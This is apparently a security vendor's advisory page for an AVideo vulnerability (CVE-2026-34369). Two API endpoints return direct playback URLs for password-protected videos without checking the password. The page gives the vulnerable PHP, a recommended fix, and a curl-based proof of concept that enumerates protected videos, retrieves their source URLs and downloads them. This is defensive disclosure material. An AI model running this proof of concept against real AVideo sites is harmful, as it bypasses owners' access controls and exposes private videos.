How severe is GHSA-q6jj-r49p-94fh?

GHSA-q6jj-r49p-94fh has a CVSS score of 5.3/10, rated MEDIUM. Review your exposure and patch according to your risk tolerance.

Which packages are affected by GHSA-q6jj-r49p-94fh?

GHSA-q6jj-r49p-94fh affects the following packages: wwbn/avideo (Packagist). Ecosystems affected: Packagist.

How do I fix GHSA-q6jj-r49p-94fh?

No patched version of wwbn/avideo has shipped for GHSA-q6jj-r49p-94fh yet. Where your build allows, override or pin the dependency away from the vulnerable range, and apply any maintainer-recommended mitigation.

How do I detect GHSA-q6jj-r49p-94fh in my Packagist dependencies?

Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for wwbn/avideo. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

How do I mitigate GHSA-q6jj-r49p-94fh if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

How does O3 Security protect against GHSA-q6jj-r49p-94fh?

O3 pinpoints whether GHSA-q6jj-r49p-94fh is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-q6jj-r49p-94fh actively exploited in the wild?

No public exploit code has been indexed for GHSA-q6jj-r49p-94fh yet. This does not mean the vulnerability cannot be exploited — absence of public exploits does not imply safety. Apply the recommended fix and use O3 Security to monitor your exposure.

What is the EPSS score for GHSA-q6jj-r49p-94fh?

GHSA-q6jj-r49p-94fh has an EPSS (Exploit Prediction Scoring System) score of 0.4%, placing it in the 29th percentile of all CVEs. EPSS is maintained by FIRST.org and estimates the probability that a vulnerability will be exploited in the wild within the next 30 days. This score indicates relatively lower exploitation probability, though the CVSS severity should still guide your patching priority.

What type of vulnerability is GHSA-q6jj-r49p-94fh?

GHSA-q6jj-r49p-94fh is classified as CWE-862 (CWE-862). This weakness type describe the underlying flaw category, which helps determine the potential impact and the right class of mitigation.

When was GHSA-q6jj-r49p-94fh published, and has it been updated?

GHSA-q6jj-r49p-94fh was published on March 30, 2026 and was last updated on March 30, 2026. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

🐘 Packagist

GHSA-q6jj-r49p-94fh

MEDIUM

AVideo has Video Password Protection Bypass via API Endpoints Returning Full Playback Sources Without Password Verification

Also known asCVE-2026-34369

Published

Mar 30, 2026

Updated

Mar 30, 2026

Affected

1 pkg

Patched

None yet

Exploits

None indexed

EPSS Exploitation Probability

via FIRST.org ↗

0.4%probability of exploitation in next 30 days

Lower Risk29th percentile+0.35%

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected

🐘wwbn/avideo

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.

Description

Summary

The get_api_video_file and get_api_video API endpoints in AVideo return full video playback sources (direct MP4 URLs, HLS manifests) for password-protected videos without verifying the video password. While the normal web playback flow enforces password checks via the CustomizeUser::getModeYouTube() hook, this enforcement is completely absent from the API code path. An unauthenticated attacker can retrieve direct playback URLs for any password-protected video by calling the API directly.

Details

The video password protection is enforced in the web UI via CustomizeUser::getModeYouTube() (plugin/CustomizeUser/CustomizeUser.php:787), which calls videoPasswordIsGood() before rendering the video player. However, this hook is only invoked during web page rendering — the API endpoints bypass it entirely.

Vulnerable endpoint 1 — get_api_video_file (plugin/API/API.php:986-1004):

public function get_api_video_file($parameters)
{
    global $global;
    $obj = $this->startResponseObject($parameters);
    $obj->videos_id = $parameters['videos_id'];
    if (!self::isAPISecretValid()) {
        if (!User::canWatchVideoWithAds($obj->videos_id)) {
            return new ApiObject("You cannot watch this video");
        }
    }
    $video = new Video('', '', $obj->videos_id);
    $obj->filename = $video->getFilename();
    // ...
    $obj->video_file = Video::getHigherVideoPathFromID($obj->videos_id);
    $obj->sources = getSources($obj->filename, true);
    return new ApiObject("", false, $obj);
}

The only access check is User::canWatchVideoWithAds() (objects/user.php:1102-1159), which checks admin status, video active status, owner status, and plugin-level restrictions (subscription/PPV). It does not check video_password. Password-protected videos have status 'a' (active), which passes all checks.

Vulnerable endpoint 2 — get_api_video (plugin/API/API.php:1635-1810):

This endpoint returns video metadata including full videos paths (line 1759) and sources arrays (line 1785) for all videos in query results, with no password verification anywhere in the function.

The intended password check exists but is never called from these endpoints:

Video::verifyVideoPassword() (objects/video.php:543-553) is the proper password verification function, and get_api_video_password_is_correct exists as a separate API endpoint — proving password verification was intended as an access control. But neither get_api_video_file nor get_api_video invoke any password check.

PoC

# Step 1: Identify a password-protected video via the video list API
curl -s 'https://target.com/plugin/API/get.json.php?APIName=video&rowCount=50' | \
  python3 -c "
import json, sys
data = json.load(sys.stdin)
for v in data.get('response',{}).get('rows',[]):
    if v.get('video_password'):
        print(f'ID: {v[\"id\"]}, Title: {v[\"title\"]}, Password Protected: YES')
        print(f'  Direct sources: {json.dumps(v.get(\"sources\",[])[0] if v.get(\"sources\") else \"none\")}')"

# Step 2: Retrieve full playback sources for the password-protected video
curl -s 'https://target.com/plugin/API/get.json.php?APIName=video_file&videos_id=<PROTECTED_VIDEO_ID>'

# Expected: access denied or password prompt
# Actual: full response with direct MP4/HLS URLs:
# {"error":false,"response":{"videos_id":"123","filename":"video_abc",
#   "video_file":"https://target.com/videos/video_abc/video_abc_HD.mp4",
#   "sources":[{"src":"https://target.com/videos/video_abc/video_abc_HD.mp4","type":"video/mp4"}]}}

# Step 3: Download the protected video directly
curl -O 'https://target.com/videos/video_abc/video_abc_HD.mp4'

Impact

Any unauthenticated user can retrieve direct playable video URLs for all password-protected videos, completely bypassing the password requirement. The get_api_video endpoint additionally exposes which videos are password-protected (via the video_password field set to '1'), allowing targeted enumeration. This renders the video_password feature ineffective for any content accessible through the API, which includes mobile apps, third-party integrations, and direct API consumers.

Recommended Fix

Add password verification to both API endpoints before returning video sources. In plugin/API/API.php:

public function get_api_video_file($parameters)
{
    global $global;
    $obj = $this->startResponseObject($parameters);
    $obj->videos_id = $parameters['videos_id'];
    if (!self::isAPISecretValid()) {
        if (!User::canWatchVideoWithAds($obj->videos_id)) {
            return new ApiObject("You cannot watch this video");
        }
        // Check video password protection
        $video = new Video('', '', $obj->videos_id);
        $storedPassword = $video->getVideo_password();
        if (!empty($storedPassword)) {
            $providedPassword = @$parameters['video_password'];
            if (empty($providedPassword) || !Video::verifyVideoPassword($providedPassword, $storedPassword)) {
                return new ApiObject("Video password required", true);
            }
        }
    }
    // ... rest of function
}

Apply the same check in get_api_video() before populating the videos and sources fields (around line 1759), replacing source data with an empty object when the password is not provided or incorrect. Also fix get_api_video_password_is_correct to use Video::verifyVideoPassword() instead of direct == comparison (line 1126), which currently fails for bcrypt hashes.

Affected Packages

1 total

Ecosystem	Package	Vulnerable range	Fix
🐘Packagist	`wwbn/avideo`	all versions	No fix

Detection & mitigation playbook

Open-source dependency

Detect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for wwbn/avideo. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Remediation status
No patched version of wwbn/avideo has shipped for GHSA-q6jj-r49p-94fh yet. Where your build allows, override or pin the dependency away from the vulnerable range, and apply any maintainer-recommended mitigation.
Mitigate without a patch
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-q6jj-r49p-94fh is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-q6jj-r49p-94fh. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

## Summary The `get_api_video_file` and `get_api_video` API endpoints in AVideo return full video playback sources (direct MP4 URLs, HLS manifests) for password-protected videos without verifying the video password. While the normal web playback flow enforces password checks via the `CustomizeUser::getModeYouTube()` hook, this enforcement is completely absent from the API code path. An unauthenticated attacker can retrieve direct playback URLs for any password-protected video by calling the API directly. ## Details The video password protection is enforced in the web UI via `CustomizeUser::

O3 Security · Impact-Aware SCA

Is GHSA-q6jj-r49p-94fh in your dependencies?

O3 detects GHSA-q6jj-r49p-94fh across Packagist dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works